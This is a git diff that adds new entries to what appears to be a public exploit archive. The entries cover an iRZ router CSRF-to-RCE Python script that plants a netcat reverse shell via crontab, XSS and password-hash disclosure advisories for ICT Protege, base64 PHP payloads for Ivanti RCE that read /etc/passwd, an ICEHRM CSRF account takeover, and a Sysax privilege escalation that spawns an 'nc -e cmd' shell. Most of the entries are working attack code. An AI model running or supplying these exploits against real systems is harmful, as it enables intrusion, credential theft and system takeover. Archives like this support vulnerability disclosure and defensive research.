diff --git a/exploits/hardware/remote/50832.py b/exploits/hardware/remote/50832.py new file mode 100755 index 000000000..958dcfe21 --- /dev/null +++ b/exploits/hardware/remote/50832.py @@ -0,0 +1,157 @@ +# Exploit Title: iRZ Mobile Router - CSRF to RCE +# Google Dork: intitle:"iRZ Mobile Router" +# Date: 2022-03-18 +# Exploit Author: Stephen Chavez & Robert Willis +# Vendor Homepage: https://en.irz.ru/ +# Software Link: https://github.com/SakuraSamuraii/ez-iRZ +# Version: Routers through 2022-03-16 +# Tested on: RU21, RU21w, RL21, RU41, RL01 +# CVE : CVE-2022-27226 + +import os +import requests +import json +import subprocess + +option = "0" + + +def main(): + print("####################################################") + print("# Welcome to IRZ CSRF to RCE Exploit - version 1.0 #") + print("####################################################") + print() + print("## by RedragonX of WHG & rej_ex of SAKURA SAMURAI ##") + print() + print("1. Post Authentication RCE (Needs Credentials)") + print("2. CSRF to RCE (No Credentials)") + print() + runit() + + +def runit(): + option = input("Select an option: ") + if option == "1": + exploit1() + elif option == "2": + exploit2() + else: + print("You must select '1' or '2'. Exiting.") + + +def exploit1(): + print("## Running Post Auth RCE exploit") + print() + print() + router_ip = input("## Enter the router ip to exploit: ") + router_port = int( + input("## Enter the victim router web page port (default is 80): ") or "80") + + router_user = input("## Enter the username for the router login: ") + router_pass = input("## Enter the password for the router login: ") + + LHOST = input("## Enter the LHOST for the router reverse shell: ") + LPORT = input("## Enter the LPORT for the router reverse shell: ") + + router_url = f'http://{router_ip}:{router_port}' + + nc1_str = f'Start a listener with the following command: nc -lvp {LPORT}' + + input(nc1_str + "\n\nPress enter once you do") + + send_json_payload(router_url, router_user, router_pass, LHOST, LPORT) + + +def send_json_payload(router_url, router_user, router_pass, lhost_ip, lhost_port): + + intro = f'Sending the payload to {router_url}\n' + print(intro) + payload_str = '{"tasks":[{"enable":true,"minutes":"*","hours":"*","days":"*","months":"*","weekdays":"*","command":"rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc ' + \ + f'{lhost_ip} {lhost_port} ' + \ + '>/tmp/f"}],"_board":{"name":"RL21","platform":"irz_mt02","time":"Wed Mar 16 16:43:20 UTC 2022"}}' + + payload_json = json.loads(payload_str) + + s = requests.Session() + + s.auth = (router_user, router_pass) + + s.headers.update( + {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"}) + s.headers.update({"X-Requested-With": "XMLHttpRequest"}) + s.headers.update({"Origin": router_url}) + s.headers.update({"Referer": router_url}) + + s.post(router_url + "/api/crontab", json=payload_json) + + exploit_str = f'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc {lhost_ip} 443 >/tmp/f' + + print( + "Request sent! You may have to wait about 2 minutes to get a shell. \nFirst shell will die due to crontab job. Start a new listener on a new port [e.g. 443], and run the following command: " + exploit_str) + print("To fix TTY: type telnet 0.0.0.0 in the shell") + + +def exploit2(): + + print("## Running CSRF to RCE exploit") + print() + print() + router_ip = input("## Enter the router ip to exploit: ") + router_port = int( + input("## Enter the victim router web page port (default is 80): ") or "80") + + LHOST = input("## Enter the LHOST for the router reverse shell: ") + LPORT = input("## Enter the LPORT for the router reverse shell: ") + + load_csrf_poc_file(router_ip, router_port, LHOST, LPORT) + + +def load_csrf_poc_file(router_ip, router_port, lhost_ip, lhost_port): + + file_path = os.path.dirname(__file__) + os.sep + "poc.template.html" + + if os.path.isfile(file_path): + with open(file_path) as poc_file: + original_poc_data_str = poc_file.read() + + new_html = original_poc_data_str.replace("{router_ip}", router_ip) + new_html = new_html.replace( + "{router_port}", str(router_port)) + + lhost_split_arr = lhost_ip.split(".") + + if len(lhost_split_arr) == 4: + + new_html = new_html.replace( + "{lhost_ip_octect_1}", lhost_split_arr[0]) + + new_html = new_html.replace( + "{lhost_ip_octect_2}", lhost_split_arr[1]) + + new_html = new_html.replace( + "{lhost_ip_octect_3}", lhost_split_arr[2]) + new_html = new_html.replace( + "{lhost_ip_octect_4}", lhost_split_arr[3]) + + new_html = new_html.replace( + "{lhost_port}", lhost_port) + + new_file_path = os.path.dirname( + __file__) + os.sep + "poc.new.html" + try: + with open(new_file_path, 'w') as new_file: + new_file.write(new_html) + + print() + print( + f'New file written to {new_file_path}. Host this file') + except FileNotFoundError: + print("You had an error writing to the file, doesn't exist.") + else: + print(f'{lhost_ip} is not a proper IPV4 address.') + + else: + print(f'{file_path} not found') + + +main() \ No newline at end of file diff --git a/exploits/hardware/remote/50835.txt b/exploits/hardware/remote/50835.txt new file mode 100644 index 000000000..81a8c5629 --- /dev/null +++ b/exploits/hardware/remote/50835.txt @@ -0,0 +1,116 @@ +# Exploit Title: ICT Protege GX/WX 2.08 - Stored Cross-Site Scripting (XSS) +# Exploit Author: LiquidWorm + +Vendor: Integrated Control Technology Ltd. +Product web page: https://www.ict.co +Affected version: GX: Ver: 2.08.1002 K1B3 + Lib: 04.00.217 + Int: 2.3.235.J013 + OS: 2.0.20 + WX: Ver: 4.00 284 H062 + App: 02.08.766 + Lib: 04.00.169 + Int: 02.2.208 + +Summary: Protege GX is an enterprise level integrated access control, intrusion +detection and building automation solution with a feature set that is easy to +operate, simple to integrate and effortless to extend. Protege WX is an all-in-one, +web-based, cross-platform system that gives you a fully functional access control +and intrusion detection solution in a fraction of the time of conventional software. +With no software to install, setup is quick and simple. Connect the Controller and +system components, then open a web browser to launch the intuitive wizard-driven +interface which guides you through the process of configuring your system. + +Desc: The application suffers from an authenticated stored XSS vulnerability. +The issue is triggered when input passed to the 'Name' parameter is not properly +sanitized before being returned to the user. This can be exploited to execute +arbitrary HTML and script code in a user's browser session in context of an +affected site. + +Tested on: Microsoft-WinCE/6.00 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2022-5699 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5699.php + + +08.02.2022 + +-- + + +UI navigation: +-------------- + +Scheduling > Daylight Savings > (Name field). + + +Decrypted POST request: +----------------------- + +POST /daylightsaving.htm + +Command&Type=Submit&SubType=GXT_DAYLIGHTSAVINGS_TBL&DaylightSavingId=1&action=update&Name=ZSL%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E&StartMonth=10&EndMonth=2&StartDay=41&EndDay=41&RecId=1 + + +Encrypted GET request: +---------------------- + +http://CONTROLLER_IP/PRT_CTRL_DIN_ISAPI.dll?8F7FFABE947FEE9C78850F2BA679A3B1645F6378696B32385B56303C43604B48F8CD082303AADCFCECEA082384C860AB16159DADCD89C9A7A2A47EE1F49A7A98AC9A8572882F88FAE5409CF6E06E04DA7F7D10AA6D45525C62B2A62FD949FF00E6B6B7471010908D9A59FBA1D9F304AD8CB24E0CE317A0870AA5A5253F0FCD58CA2BC874AC002CB62422E184FB9F13161C9C00E08F258B8519578EA2793A0C28A4AF51CF65637C0C2F972CE3F49703214A63AA78B3EBE5C720DBE1E9C97E772334EC95480956E27DB6D1DF4489C5D60CCE27D69B388CA6C69A9DC72D85127F870DDA4E459CA245508EBFD66D1C83D9FA12838C1F426E538D5D75192B57DF5AF6 + + +Additional info: +---------------- + +Databse backup predictable name: Db_D3037E8A_8_Feb_22.bak +The D3037E8A is the serial number of the onboard reader. + +Encrypt/Decrypt functions: +-------------------------- + +From console: +> localStorage.getItem("WXKey") +< '8EDB22D9FB767538' + +function encryptAES(a, c) { + a = a.toString(); + a = unescape(encodeURIComponent(a)); + "undefined" == typeof c && (c = !0); + if (0 == servertype) + return a; + var b = localStorage.getItem("WXKey"); + if ("" == b || null == b) + return a; + for (var d = "", e = 0; 16 > e; e++) + d += String.fromCharCode(Math.floor(75 * Math.random() + 48)); + a = d + mcrypt.Encrypt(addPKCS7(a), d, b, "rijndael-128", "cbc"); + return a = c ? getCookie("SESSID") + strToHex(a) : strToHex(a) +} + +function decryptAES(a) { + if (null == a) + return ""; + a = a.toString(); + if (" < Packet not Init and not encrypted. >" == a) + a = 0 == servertype ? "login.php" : "login.htm", + window.location = a + "?" + Math.random().toString(16).substring(2, 8).toLowerCase(); + else if ("" == a.substr(0, 17)) + a = 0 == servertype ? "login.php?logout" : "login.htm?logout", + window.location = a + "?" + Math.random().toString(16).substring(2, 8).toLowerCase(); + else { + if (0 == servertype) + return a; + var c = localStorage.getItem("WXKey"); + if ("" == c) + return a; + a = hexToStr(a); + var b = a.substr(0, 16); + a = a.substr(16, a.length); + a = mcrypt.Decrypt(a, b, c, "rijndael-128", "cbc").replace(/\x00+$/g, ""); + a = removePKCS7(a); + return a = decodeURIComponent(escape(a)) + } \ No newline at end of file diff --git a/exploits/hardware/remote/50836.txt b/exploits/hardware/remote/50836.txt new file mode 100644 index 000000000..ee99fbf8a --- /dev/null +++ b/exploits/hardware/remote/50836.txt @@ -0,0 +1,52 @@ +# Exploit Title: ICT Protege GX/WX 2.08 - Client-Side SHA1 Password Hash Disclosure +# Exploit Author: LiquidWorm + +Vendor: Integrated Control Technology Ltd. +Product web page: https://www.ict.co +Affected version: GX: Ver: 2.08.1002 K1B3 + Lib: 04.00.217 + Int: 2.3.235.J013 + OS: 2.0.20 + WX: Ver: 4.00 284 H062 + App: 02.08.766 + Lib: 04.00.169 + Int: 02.2.208 + +Summary: Protege GX is an enterprise level integrated access control, intrusion +detection and building automation solution with a feature set that is easy to +operate, simple to integrate and effortless to extend. Protege WX is an all-in-one, +web-based, cross-platform system that gives you a fully functional access control +and intrusion detection solution in a fraction of the time of conventional software. +With no software to install, setup is quick and simple. Connect the Controller and +system components, then open a web browser to launch the intuitive wizard-driven +interface which guides you through the process of configuring your system. + +Desc: The application is vulnerable to improper access control that allows an +authenticated operator to disclose SHA1 password hashes (client-side) of other +users/operators. + +Tested on: Microsoft-WinCE/6.00 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2022-5700 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5700.php + + +08.02.2022 + +-- + + +Navigate to http://CONTROLLER_IP/operator.htm + +Source: + +

+... +... + +... \ No newline at end of file diff --git a/exploits/multiple/remote/50833.txt b/exploits/multiple/remote/50833.txt new file mode 100644 index 000000000..b8cf77472 --- /dev/null +++ b/exploits/multiple/remote/50833.txt @@ -0,0 +1,25 @@ +# Exploit Title: Ivanti Endpoint Manager 4.6 - Remote Code Execution (RCE) +# Date: 20/03/2022 +# Exploit Author: d7x +# Vendor Homepage: https://www.ivanti.com/ +# Software Link: https://forums.ivanti.com/s/article/Customer-Update-Cloud-Service-Appliance-4-6 +# Version: CSA 4.6 4.5 - EOF Aug 2021 +# Tested on: Linux x86_64 # CVE : CVE-2021-44529 +# CVE : CVE-2021-44529 + +### +This is the RCE exploit for the following advisory (officially discovered by Jakub Kramarz): +https://forums.ivanti.com/s/article/SA-2021-12-02?language=en_US + +Shoutouts to phyr3wall for providing a hint to where the obfuscated code relies + +@d7x_real +https://d7x.promiselabs.net +https://www.promiselabs.net +### + +# cat /etc/passwd +curl -i -s -k -X $'GET' -b $'e=ab; exec=c3lzdGVtKCJjYXQgL2V0Yy9wYXNzd2QiKTs=; pwn=; LDCSASESSID=' 'https://.../client/index.php' | tr -d "\n" | grep -zPo '\K.*?(?=)'; echo + +# sleep for 10 seconds +curl -i -s -k -X $'GET' -b $'e=ab; exec=c2xlZXAoMTApOw==; pwn=; LDCSASESSID=' 'https://.../client/index.php' | tr -d "\n" | grep -zPo '\K.*?(?=)'; echo \ No newline at end of file diff --git a/exploits/php/webapps/50831.txt b/exploits/php/webapps/50831.txt new file mode 100644 index 000000000..066b605f5 --- /dev/null +++ b/exploits/php/webapps/50831.txt @@ -0,0 +1,73 @@ +# Exploit Title: ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Takeover +# Date: 18/03/2022 +# Exploit Author: Devansh Bordia +# Vendor Homepage: https://icehrm.com/ +# Software Link: https://github.com/gamonoid/icehrm/releases/tag/v31.0.0.OS +# Version: 31.0.0.OS +#Tested on: Windows 10 + +1. About - ICEHRM +IceHrm employee management system allows companies to centralize confidential employee information and define access permissions to authorized personnel to ensure that employee information is both secure and accessible. + +2. Description: +The application has an update password feature which has a CSRF vulnerability that allows an attacker to change the password of any arbitrary user leading to an account takeover. + +3. Steps To Reproduce: +- Create an User name:Gaurav with permission of the Employee using the Admin User of the application and set his password. +- Now login into the application using his credentials and navigate to Update Password Feature to change the password. +- Intercept the request in Proxy and we can see there is a GET request used to change password and also NO CSRF Token is being used. +- Finally using Burpsuite create CSRF POC and save it as exploit.html. +- Now change the password in the POC to any password we want. +- Finally we open this POC in the same browser session and click on the submit button. +- At last when retrying to login into the application we can see that password has been reset for the account leading to account takeover. + +4. Vulnerable Request: + +GET +/app/service.php?t=Employee&a=ca&sa=changePassword&mod=modules=employees&req={"current":"Test@123 +","pwd":"Dummy@123"} HTTP/1.1 +Host: localhost:8070 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) +Gecko/20100101 Firefox/98.0 +Accept: application/json, text/plain, */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: close +Referer: +http://localhost:8070/app/?g=modules&n=employees&m=module_Personal_Information +Cookie: PHPSESSID=k8d27ve456j0jb56ga885j1vvb +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-origin + +5. Exploit POC (exploit.html) + + + + + + + + + +
+ + + + + + + + + + + + + +
+ + + + \ No newline at end of file diff --git a/exploits/windows/local/50834.txt b/exploits/windows/local/50834.txt new file mode 100644 index 000000000..06e281276 --- /dev/null +++ b/exploits/windows/local/50834.txt @@ -0,0 +1,37 @@ +# Exploit Author: bzyo (@bzyo_) +# Exploit Title: Sysax FTP Automation 6.9.0 - Privilege Escalation +# Date: 03-20-2022 +# Vulnerable Software: Sysax FTP Automation 6.9.0 +# Vendor Homepage: https://www.sysax.com/ +# Version: 6.9.0 +# Software Link: https://www.sysax.com/download/sysaxauto_setup.msi +# Tested on: Windows 10 x64 + +# Details: +Sysax Scheduler Service runs as Local System. By default the application allows for low privilege users to create/run backup jobs other than themselves. By removing the option to run as current user or another, the task will run as System. A low privilege user could abuse this and escalate their privileges to local system. + +# Prerequisites: +To successfully exploit this vulnerability, an attacker must already have local access to a system running Sysax FTP Automation using a low privileged user account + +# Exploit: +Logged in as low privileged account + +1. Create folder c:\temp +2. Download netcat (nc.exe) to c:\temp +3. Create file 'pwn.bat' in c:\temp with contents + c:\temp\nc.exe localhost 1337 -e cmd +4. Open command prompt and netcat listener + nc -nlvvp 1337 +5. Open sysaxschedscp.exe from C:\Program Files (x86)\SysaxAutomation +6. Select Setup Scheduled/Triggered Tasks + - Add task (Triggered) + - Update folder to monitor to be c:\temp + - Check 'Run task if a file is added to the monitor folder or subfolder(s)' + - Choose 'Run any other Program' and choose c:\temp\pwn.bat + - Uncheck 'Login as the following user to run task' + - Finish and Save +7. Create new text file in c:\temp +8. Check netcat listener + C:\WINDOWS\system32>whoami + whoami + nt authority\system \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index a593038b9..8b7a61436 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11472,6 +11472,7 @@ id,file,description,date,author,type,platform,port 50818,exploits/windows/local/50818.txt,"WOW21 5.0.1.9 - 'Service WOW21_Service' Unquoted Service Path",1970-01-01,"Antonio Cuomo",local,windows, 50819,exploits/windows/local/50819.txt,"Sandboxie-Plus 5.50.2 - 'Service SbieSvc' Unquoted Service Path",1970-01-01,"Antonio Cuomo",local,windows, 50824,exploits/windows/local/50824.txt,"VIVE Runtime Service - 'ViveAgentService' Unquoted Service Path",1970-01-01,"Faisal Alasmari",local,windows, +50834,exploits/windows/local/50834.txt,"Sysax FTP Automation 6.9.0 - Privilege Escalation",1970-01-01,bzyo,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139 @@ -18650,6 +18651,10 @@ id,file,description,date,author,type,platform,port 50821,exploits/hardware/remote/50821.py,"Seowon SLR-120 Router - Remote Code Execution (Unauthenticated)",1970-01-01,"Aryan Chehreghani",remote,hardware, 50822,exploits/multiple/remote/50822.txt,"Tdarr 2.00.15 - Command Injection",1970-01-01,"Sam Smith",remote,multiple, 50829,exploits/multiple/remote/50829.py,"Apache APISIX 2.12.1 - Remote Code Execution (RCE)",1970-01-01,Ven3xy,remote,multiple, +50832,exploits/hardware/remote/50832.py,"iRZ Mobile Router - CSRF to RCE",1970-01-01,"John Jackson",remote,hardware, +50833,exploits/multiple/remote/50833.txt,"Ivanti Endpoint Manager 4.6 - Remote Code Execution (RCE)",1970-01-01,d7x,remote,multiple, +50835,exploits/hardware/remote/50835.txt,"ICT Protege GX/WX 2.08 - Stored Cross-Site Scripting (XSS)",1970-01-01,LiquidWorm,remote,hardware, +50836,exploits/hardware/remote/50836.txt,"ICT Protege GX/WX 2.08 - Client-Side SHA1 Password Hash Disclosure",1970-01-01,LiquidWorm,remote,hardware, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php, @@ -44896,5 +44901,6 @@ id,file,description,date,author,type,platform,port 50823,exploits/multiple/webapps/50823.txt,"Baixar GLPI Project 9.4.6 - SQLi",1970-01-01,"Prof. Joas Antonio",webapps,multiple, 50825,exploits/php/webapps/50825.py,"Moodle 3.11.5 - SQLi (Authenticated)",1970-01-01,"Chris Anastasio",webapps,php, 50826,exploits/php/webapps/50826.py,"Pluck CMS 4.7.16 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Ashish Koli",webapps,php, +50831,exploits/php/webapps/50831.txt,"ICEHRM 31.0.0.0S - Cross-site Request Forgery (CSRF) to Account Takeover",1970-01-01,"Devansh Bordia",webapps,php, 50828,exploits/php/webapps/50828.sh,"Tiny File Manager 2.4.6 - Remote Code Execution (RCE)",1970-01-01,"FEBIN MON SAJI",webapps,php, 50830,exploits/php/webapps/50830.txt,"Wordpress Plugin iQ Block Country 1.2.13 - Arbitrary File Deletion via Zip Slip (Authenticated)",1970-01-01,"Ceylan BOZOĞULLARINDAN",webapps,php,